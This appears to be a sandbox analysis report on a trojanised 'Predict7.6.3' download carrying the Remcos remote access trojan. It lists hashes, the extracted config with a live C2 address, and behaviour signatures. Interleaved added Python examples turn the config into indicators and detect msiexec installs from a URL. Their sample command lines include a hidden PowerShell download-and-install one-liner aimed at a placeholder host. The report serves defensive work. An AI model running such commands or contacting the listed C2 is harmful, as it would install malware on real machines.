Resubmissions

  • 16-10-2024 08:03  241016-jxqefszhpg  (score 10/10)

  • 16-10-2024 07:59  241016-jvwtfszgrg  (score 10/10)

General

  • Target

    Predict7.6.3.zip

  • Size

    39.8MB

  • Sample

    241016-jvwtfszgrg

  • MD5

    1ce6625f0b9a60f382b9534ba41405bc

  • SHA1

    e3c7d2da84736d121a6109ca8b139957b7a1c409

  • SHA256

    2bf994daf30eb46bfbf9f43028717c14e4693a7afb4a5c2bb7b6d852daed2b86

  • SHA512

    6f0b33b5a9f7875f659c50eb962c5c1f29fd2dee615197f63dbca8c82c14e0df6a2d0f23c8419f12842ffe1d09e6b394b6bc2de5007902a16825f895324bee51

  • SSDEEP

    786432:GxucXLnn0SjhGKhGjDbJ8LB5VeOaaeUcBoGhsV0J4IdK62IOlW35efx3:y0StEJGB5ZegssV9OK62E5efx3

Malware Config

Extracted

Family

remcos

Botnet

NEWINCH

C2

185.157.162.103:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Gameprot-LPTFIG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5
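The extracted configuration above is mostly useful once it is turned into something a responder can act on: which C2 to block, which host artefacts to hunt for, and which of the configured capabilities are actually switched on. The following script is an added example, not part of the sandbox report or of Remcos itself. Its REMCOS_CONFIG dictionary copies the values from the "Malware Config" block; the assumption that copy_folder and keylog_folder sit under %AppData% (Remcos's usual layout) is this example's, not something the report states.

```python
"""Derive indicators and a capability summary from an extracted Remcos config.

Added example, not part of the sandbox report. REMCOS_CONFIG mirrors the
report's "Malware Config" block; ASSUMED_BASE is this example's assumption.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Values as reported above (strings, exactly as the sandbox emits them).
REMCOS_CONFIG: Dict[str, str] = {
    "botnet": "NEWINCH",
    "c2": "185.157.162.103:2404",
    "mutex": "Gameprot-LPTFIG",
    "copy_file": "remcos.exe",
    "copy_folder": "Remcos",
    "install_flag": "false",
    "keylog_file": "logs.dat",
    "keylog_folder": "remcos",
    "keylog_flag": "false",
    "screenshot_flag": "false",
    "screenshot_folder": "Screenshots",
    "screenshot_path": "%AppData%",
}

# Assumed parent directory for copy_folder / keylog_folder (example's assumption).
ASSUMED_BASE = "%AppData%"


@dataclass
class Summary:
    c2: List[Tuple[str, int]] = field(default_factory=list)
    host: List[str] = field(default_factory=list)      # host-based IOCs
    enabled: List[str] = field(default_factory=list)   # capabilities switched on
    disabled: List[str] = field(default_factory=list)  # capabilities switched off


def is_on(cfg: Dict[str, str], key: str) -> bool:
    """Sandbox output uses the strings 'true'/'false'; accept '1' as true too."""
    return str(cfg.get(key, "false")).strip().lower() in ("true", "1")


def parse_c2(value) -> List[Tuple[str, int]]:
    """Parse one 'host:port' string or a list of them. Malformed entries raise,
    so a bad config cannot silently produce an empty block list."""
    entries = value if isinstance(value, (list, tuple)) else [value]
    parsed = []
    for entry in entries:
        host, sep, port = str(entry).strip().rpartition(":")
        if not sep or not host or not port.isdigit() or not 0 < int(port) < 65536:
            raise ValueError(f"malformed C2 entry: {entry!r}")
        parsed.append((host, int(port)))
    return parsed


def summarize(cfg: Dict[str, str]) -> Summary:
    s = Summary()
    s.c2 = parse_c2(cfg["c2"])
    s.host.append(f"mutex: {cfg['mutex']}")

    # Each flag gates a file artefact; only list the path when the feature is on.
    if is_on(cfg, "install_flag"):
        s.host.append(f"file: {ASSUMED_BASE}\\{cfg['copy_folder']}\\{cfg['copy_file']}")
        s.enabled.append("install (self-copy)")
    else:
        s.disabled.append("install (self-copy)")

    if is_on(cfg, "keylog_flag"):
        s.host.append(f"file: {ASSUMED_BASE}\\{cfg['keylog_folder']}\\{cfg['keylog_file']}")
        s.enabled.append("keylogging")
    else:
        s.disabled.append("keylogging")

    if is_on(cfg, "screenshot_flag"):
        s.host.append(f"dir: {cfg['screenshot_path']}\\{cfg['screenshot_folder']}")
        s.enabled.append("screenshots")
    else:
        s.disabled.append("screenshots")
    return s


if __name__ == "__main__":
    summary = summarize(REMCOS_CONFIG)
    for host, port in summary.c2:
        print(f"block {host}:{port} (botnet {REMCOS_CONFIG['botnet']})")
    for ioc in summary.host:
        print("hunt", ioc)
    print("enabled:", summary.enabled or "none")
    print("disabled:", summary.disabled)
```

For this particular configuration the durable indicators are the C2 socket and the mutex: with install_flag, keylog_flag and screenshot_flag all false, the sample neither copies itself to %AppData%\Remcos\remcos.exe nor writes logs.dat, so a hunt keyed on those file paths would miss it.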

Targets

    • Target

      Predict7.6.3/Launcher8.3.6.msi

    • Size

      34.8MB

    • MD5

      62a70b6a607c787a26ecd7aae7f5cfa7

    • SHA1

      24be3506a7eb8bcddd63810813934138902a07d1

    • SHA256

      975bcef0f45e9012fd3d1e06133d916eec9a77bfe40bf4d526711a40ff956dfb

    • SHA512

      d18514bae872ce947a05551485d377a3d8de1f807aa9c486496cdef455f09f71b16967b62a24e95d5c62217d63c63939337f66023815b35a0fbd9e87b2c6a18a

    • SSDEEP

      786432:Fx7ZJrqPhKmBwZDjzQrdj1CqeqaGK3Eafgtil2EJGw0SEx:7rqt6zKdj3auMgtTyGw0

    • Remcos

      Remcos is a commercially sold, closed-source remote control and surveillance tool; outside its advertised use it is widely deployed as a remote access trojan (RAT).

    • Use of msiexec (install) with remote resource

      msiexec.exe was run in install mode with a URL rather than a local file as the package source, so the installer is fetched over the network at run time.

    • Blocklisted process makes network request

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

    • Suspicious use of SetThreadContext

      SetThreadContext rewrites a thread's register state; process hollowing and similar injection techniques use it to redirect a suspended process into attacker-written code.
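The "Use of msiexec (install) with remote resource" signature reduces to a check on process-creation command lines: an msiexec install switch whose package argument is a URL. The detection below is an added example, not part of the report or of the sandbox's own signature logic. The command lines it runs over are constructed for illustration (the report does not show the command line it observed) and use the reserved .invalid domain rather than any real host.

```python
"""Flag msiexec invocations that install a package from a URL.

Added example, not part of the report. SAMPLE_CMDLINES are constructed
process-creation command lines, not data from this analysis.
"""
import re
from typing import List, Tuple

# msiexec[.exe], optionally quoted, then any switches, then an install switch
# (/i, /package, /a, or the dash forms) whose argument starts with http(s)://.
MSIEXEC_REMOTE_RE = re.compile(
    r"msiexec(?:\.exe)?\"?\s+(?:[^\s]+\s+)*?[/-](?:i|package|a)\s+\"?"
    r"(?P<url>https?://[^\s\"']+)",
    re.IGNORECASE,
)
# Quiet/no-UI switches: /q, /qn, /qb, /qr, /qf, /quiet (and dash forms).
QUIET_RE = re.compile(r"(?:^|\s)[/-]q(?:n|b|r|f|uiet)?(?=\s|$|[\"'])", re.IGNORECASE)

# Constructed samples: a direct quiet remote install, a local install, an
# uninstall, a remote install wrapped in PowerShell, and a non-quiet remote install.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\msiexec.exe" /i https://files.example.invalid/Launcher8.3.6.msi /qn',
    r'msiexec.exe /i "C:\Users\user\Downloads\Launcher8.3.6.msi"',
    r'MSIEXEC /X {00000000-0000-0000-0000-000000000000} /qn',
    r'powershell.exe -nop -w hidden -c "msiexec /i http://files.example.invalid/a.msi /quiet"',
    r'msiexec.exe /i http://files.example.invalid/Launcher.msi',
]


def detect_remote_msi(cmdlines: List[str]) -> List[Tuple[int, str, bool]]:
    """Return (1-based line number, package URL, quiet) for each remote install.

    Searching for the msiexec token anywhere in the line (rather than only as
    the image name) also catches invocations nested inside a PowerShell -c
    argument, which is how loaders commonly stage them.
    """
    hits = []
    for n, cmd in enumerate(cmdlines, 1):
        m = MSIEXEC_REMOTE_RE.search(cmd)
        if not m:
            continue
        # Only consider switches that follow the msiexec token itself.
        quiet = QUIET_RE.search(cmd[m.start():]) is not None
        hits.append((n, m.group("url"), quiet))
    return hits


if __name__ == "__main__":
    for line_no, url, quiet in detect_remote_msi(SAMPLE_CMDLINES):
        print(f"line {line_no}: remote MSI install from {url} (quiet={quiet})")
```

Local installs and uninstalls are deliberately not flagged, so the rule stays quiet on ordinary software deployment; a quiet remote install from a host the organisation does not manage is the case worth paging on.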

MITRE ATT&CK Enterprise v15